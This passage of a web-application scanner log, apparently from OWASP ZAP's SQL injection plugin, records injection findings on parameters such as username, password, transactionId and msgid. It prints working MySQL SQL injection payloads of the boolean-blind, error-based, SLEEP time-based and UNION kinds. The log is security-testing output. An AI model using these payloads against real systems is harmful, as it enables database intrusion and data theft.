org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9028194 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9028198 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9028252 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9028257 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9028260 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9028267 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9028308 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [2010-01-01' AND 1078=1078 AND 'keGb'='keGb] on parameter 'transactionDate' 9028309 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9028314 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [2010-01-01' AND (SELECT 6116 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6116=6116,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'LJYk'='LJYk] on parameter 'transactionDate' 9028314 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9038145 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))xufc)] on parameter 'orderby' 9038146 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9038335 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (4412=4412) THEN 4412 ELSE 4412*(SELECT 4412 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'msgid' 9038336 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9038338 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [1 AND (SELECT 1851 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1851=1851,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'msgid' 9038339 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9038354 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-01-01' AND (SELECT * FROM (SELECT(SLEEP(5)))fZXE) AND 'FDYi'='FDYi] on parameter 'transactionDate' 9038355 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9038499 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [2010-01-01' #] on parameter 'transactionDate' 9038500 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9038518 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [10000 AND 6832=6832] on parameter 'minBalanace' 9038519 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9038522 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [10000 AND (SELECT 7692 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7692=7692,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'minBalanace' 9038522 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9048381 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))MfQV)] on parameter 'msgid' 9048382 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9048560 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [10000 AND (SELECT * FROM (SELECT(SLEEP(5)))loAl)] on parameter 'minBalanace' 9048561 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9048578 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9048583 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9048626 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9048631 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9048648 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9048653 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9048696 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9048703 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9048740 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [132 AND 4395=4395] on parameter 'transactionId' 9048744 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9048747 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [132 AND (SELECT 7739 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7739=7739,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'transactionId' 9048747 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9048753 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (8611=8611) THEN 8611 ELSE 8611*(SELECT 8611 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'msgId' 9048753 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9048761 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [1 AND (SELECT 8024 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(8024=8024,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'msgId' 9048763 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9058804 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [132 AND (SELECT * FROM (SELECT(SLEEP(5)))eFMi)] on parameter 'transactionId' 9058808 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9058811 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))LNnV)] on parameter 'msgId' 9058811 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9058824 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9058831 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9058892 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9058897 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9058927 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9058932 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9058933 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [132 #] on parameter 'transactionId' 9058935 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9058960 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [1 #] on parameter 'msgId' 9058961 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9059168 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (6159=6159) THEN 6159 ELSE 6159*(SELECT 6159 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'orderby' 9059170 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9059178 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [msgid AND (SELECT 6949 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6949=6949,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'orderby' 9059179 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9059572 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'msg' is not injectable 9069229 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [msgid AND (SELECT * FROM (SELECT(SLEEP(5)))uaDi)] on parameter 'orderby' 9069231 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9069582 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [textvalue%' AND (SELECT 7501 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7501=7501,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='] on parameter 'msg' 9069583 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9069832 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [textvalue' AND (SELECT * FROM (SELECT(SLEEP(5)))IRfy) AND 'MbCJ'='MbCJ] on parameter 'username' 9069833 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9069873 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9069878 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9069883 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9069887 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9069939 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9069945 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9069948 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9069952 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9079620 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [textvalue%' AND (SELECT * FROM (SELECT(SLEEP(5)))xhtC) AND '%'='] on parameter 'msg' 9079621 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9079664 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9079670 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9079747 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9079753 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9079754 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [textvalue' #] on parameter 'msg' 9079755 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9080243 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [textvalue' AND (SELECT * FROM (SELECT(SLEEP(5)))PFGs) AND 'zCdW'='zCdW] on parameter 'username' 9080246 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9080300 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9080307 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9080316 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9080322 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9080395 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9080402 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9080404 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [textvalue' #] on parameter 'username' 9080405 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9080499 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9080888 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'msg' is not injectable 9081406 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'transactionDate' is not injectable 9090528 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [textvalue2' AND (SELECT * FROM (SELECT(SLEEP(5)))FgNP) AND 'FpVW'='FpVW] on parameter 'password' 9090529 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9090569 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9090574 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9090579 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9090591 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9090652 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9090657 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9090658 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [textvalue2' #] on parameter 'password' 9090659 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9091658 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [895 AND (SELECT * FROM (SELECT(SLEEP(5)))RxaN)] on parameter 'transactionId' 9091659 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9101845 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-02-02' AND (SELECT * FROM (SELECT(SLEEP(5)))EUro) AND 'iDfU'='iDfU] on parameter 'transactionDate' 9101846 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9102116 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9102120 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9102122 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9102124 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9102125 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9102126 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9102127 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9102129 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9102131 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9102132 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9102133 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9102134 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9102137 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9102138 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9102142 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9102144 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9102146 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9102147 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9102148 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9102150 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9102151 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9102152 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9102153 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9102155 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9102156 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9102158 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9107160 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9107161 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9107163 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9107164 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9112166 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9112168 [ZAP-ActiveScanner-0] WARN 